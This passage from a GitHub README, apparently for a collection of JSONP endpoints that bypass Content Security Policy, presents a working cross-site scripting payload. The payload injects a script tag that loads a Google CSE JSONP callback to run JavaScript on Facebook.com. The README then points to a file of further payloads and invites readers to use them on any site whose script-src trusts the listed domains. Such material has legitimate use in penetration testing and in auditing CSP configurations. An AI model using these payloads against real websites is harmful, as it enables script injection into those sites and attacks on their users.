zigoo0/JSONBee/README.md

 Facebook.com allows *.google.com in its CSP policy, thus, below payload would work like a charm:
 `"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>`

-Check the jsonp.txt file for the rest of the payloads.
-The payloads will regulary be updated.
+If you came across a website that trusts any of the domains in jsonp.txt file in its script-src directive, then pickup a payload  that matches the domain and have fun :)